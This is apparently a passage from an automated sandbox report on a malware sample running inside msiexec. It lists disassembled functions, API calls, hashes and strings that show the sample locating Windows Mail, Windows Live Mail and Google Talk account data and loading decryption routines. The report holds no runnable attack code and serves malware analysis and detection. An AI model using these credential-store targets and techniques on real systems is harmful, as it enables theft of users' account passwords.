                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                        • String ID: k:v
                                                                                                        • API String ID: 3662548030-4078055367
                                                                                                        • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                        • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                        • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                        • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                                        Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0044430B
                                                                                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                          • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                          • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                          • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                        • memset.MSVCRT ref: 00444379
                                                                                                        • memset.MSVCRT ref: 00444394
                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                        • strlen.MSVCRT ref: 004443DB
                                                                                                        • _strcmpi.MSVCRT ref: 00444401
                                                                                                        Strings
                                                                                                        • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                        • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                        • Store Root, xrefs: 004443A5
                                                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                        • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                        • API String ID: 3203569119-2578778931
                                                                                                        • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                        • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                        • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                        • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                        Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2054149589-0
                                                                                                        • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                        • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                        • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                        • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                        Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 317 40baa0-40bab3 call 407e30 324 40bab5-40bac1 317->324 325 40bafa-40bb09 SetCursor 317->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->317 332->317 333->317 334->317
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor_mbsicmpqsort
                                                                                                        • String ID: /nosort$/sort
                                                                                                        • API String ID: 882979914-1578091866
                                                                                                        • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                        • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                        • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                        • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                        Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004109F7
                                                                                                          • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                          • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                        • memset.MSVCRT ref: 00410A32
                                                                                                        • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 3143880245-0
                                                                                                        • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                        • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                        • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                        • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                        Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                        • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                        • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                        • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                        Function 00410DBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 377 410e45-410e4f call 410a9c 372->377 373->372 376 410e22-410e25 373->376 376->372 380 410e37-410e40 376->380 386 410e51-410e76 call 410d3d call 410add 377->386 387 410e7f-410e92 _mbscpy 377->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->377 382->371 384 410de9-410dec 382->384 384->371 384->379 389 410e95-410e97 385->389 386->387 387->389
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                          • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                        • memset.MSVCRT ref: 00410E10
                                                                                                        • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                        • API String ID: 119022999-2036018995
                                                                                                        • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                        • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                        • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                        • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                        Function 004085D2 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                                        APIs
                                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                          • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                          • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                        • memset.MSVCRT ref: 00408620
                                                                                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                        • memset.MSVCRT ref: 00408671
                                                                                                        Strings
                                                                                                        • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                                        • String ID: Software\Google\Google Talk\Accounts
                                                                                                        • API String ID: 3996936265-1079885057
                                                                                                        • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                        • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                        • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                        • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                        Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 449 40ceb2 446->449 450 40cea8-40ceb0 446->450 448 40cebd-40cecc _strcmpi 447->448 451 40ced3-40cedc call 40cdda 448->451 452 40cece-40ced1 448->452 453 40ceb4-40ceb6 449->453 450->453 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->448 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                          • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                        • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strlen$_strcmpimemset
                                                                                                        • String ID: /stext
                                                                                                        • API String ID: 520177685-3817206916
                                                                                                        • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                        • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                        • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                        • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                        Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                        • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 145871493-0
                                                                                                        • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                        • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                        • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                        • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                        Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                          • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                          • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                          • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4165544737-0
                                                                                                        • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                        • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                        • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                        • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                        Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                        • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                        • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                        • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                        Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                        • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                        • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                        • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                        Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                        • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                        • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                        • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                        Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFind
                                                                                                        • String ID:
                                                                                                        • API String ID: 1863332320-0
                                                                                                        • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                        • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                        • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                        • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                        Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                        • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                        • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                        • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                        Non-executed Functions

                                                                                                        Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                        • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                        • API String ID: 2238633743-192783356
                                                                                                        • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                        • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                        • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                        • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                        Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
